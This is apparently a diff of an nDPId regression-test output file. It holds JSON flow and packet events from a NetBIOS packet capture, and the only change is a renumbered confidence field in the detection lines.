00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1447772221776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221776,"pkt":"ABzEEHkPACFislxDCABFAABOBFAAAH8RHeEKAAFXCgAEGOHsAIkAOqS0IKgAAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221776,"flow_last_seen":1447772221776,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221776,"l3_proto":"ip4","src_ip":"10.0.1.87","dst_ip":"10.0.4.24","src_port":57836,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"netbios.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1447772221776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772221776,"pkt":"ACFislxDABzEEHkPCABFAADLdA9AAIARbKQKAAQYCgABVwCJ4ewAt5RIIKiEAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1447772221882,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772221882,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOIosAAIAR+bAKAARlCgAF\/wCJAIkAOuxhlzUBEAABAAAAAAAAIEVORkZFTUVKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772221882,"flow_last_seen":1447772221882,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772221882,"l3_proto":"ip4","src_ip":"10.0.4.101","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772225411,"pkt":"\/\/\/\/\/\/\/\/AOCBt3SFCABFAABOYEAAAIARu7sKAASlCgAF\/wCJAIkAOvrLhIYBEAABAAAAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"netbios.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.165","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1447772225411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1447772225411,"pkt":"AOCBt3SFABzEEHkPCABFAABaEmgAAIARC28KAAQYCgAEpQCJAIkARtanhIaFAAAAAAEAAAAAIEVIRkZFT0VPRUJGQ0NBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABBg="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"netbios.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772225411,"flow_last_seen":1447772225411,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772225411,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.4.165","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1447772230221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772230221,"pkt":"\/\/\/\/\/\/\/\/ABj+KG95CABFAABOBVEAAIARFw4KAARCCgAF\/wCJAIkAOg\/qh84BEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"netbios.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772230221,"flow_last_seen":1447772230221,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772230221,"l3_proto":"ip4","src_ip":"10.0.4.66","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772234353,"pkt":"\/\/\/\/\/\/\/\/ABzEEHkPCABFAABOQtEAAIAR2bcKAAQYCgAF\/wCJAIkAOvkLntYBEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"netbios.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.4.24","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1447772234353,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1447772234353,"pkt":"ABzEEHkP7Khr9GB3CABFAABaM4kAAIAR6fEKAAUBCgAEGACJAIkARtMVntaFAAAAAAEAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEABJPgAAYAAAoABQE="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"netbios.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772234353,"flow_last_seen":1447772234353,"flow_idle_time":200000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1447772234353,"l3_proto":"ip4","src_ip":"10.0.5.1","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1447772235481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1447772235481,"pkt":"\/\/\/\/\/\/\/\/ADBIsLGmCABFAADlboAAAIARrCwKAAVdCgAF\/wCKAIoA0eR9EQ7pCQoABV0AigC7AAAgRUNFUEZIRUpFRkNBQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZHRUpFSEVKRU1FQkVPRkVGUEVIRkNFUEZGRkFDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAQk9XSUUAAAAAAAAAAAAAAAYBBxABAA8BVaoA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"netbios.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772235481,"flow_last_seen":1447772235481,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1447772235481,"l3_proto":"ip4","src_ip":"10.0.5.93","dst_ip":"10.0.5.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1447772238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772238479,"pkt":"ABzEEHkPAOCBt8asCABFAABOD1sAAIARDUQKAAXpCgAEGACJAIkAOgf\/mi8AAAABAAAAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAE="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238479,"flow_last_seen":1447772238479,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238479,"l3_proto":"ip4","src_ip":"10.0.5.233","dst_ip":"10.0.4.24","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"netbios.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1447772238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1447772238479,"pkt":"AOCBt8asABzEEHkPCABFAADLWT8AAIARwuIKAAQYCgAF6QCJAIkAt\/eSmi+EAAAAAAEAAAAAIENLQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBAAAhAAEAAAAAAHcER1VOTkFSICAgICAgICAgAAQAVklHSUxBTlRfR1JPVVAgAIQAR1VOTkFSICAgICAgICAgIAQAVklHSUxBTlRfR1JPVVAgHoQAABzEEHkPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1447772238721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772238721,"pkt":"\/\/\/\/\/\/\/\/EGBLoLzrCABFAABOP6wAAIAR3OYKAAQOCgAF\/wCJAIkAOtzbuxABEAABAAAAAAAAIEVIRkZGQ0ZGQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"netbios.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772238721,"flow_last_seen":1447772238721,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1447772238721,"l3_proto":"ip4","src_ip":"10.0.4.14","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"netbios.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1447772239929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1447772239929,"pkt":"\/\/\/\/\/\/\/\/AOCBdSQGCABFAABOZPwAAIARtz8KAARlCgAF\/wCJAIkAOvRglzYBEAABAAAAAAAAIEVPRkdGQ0RKQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 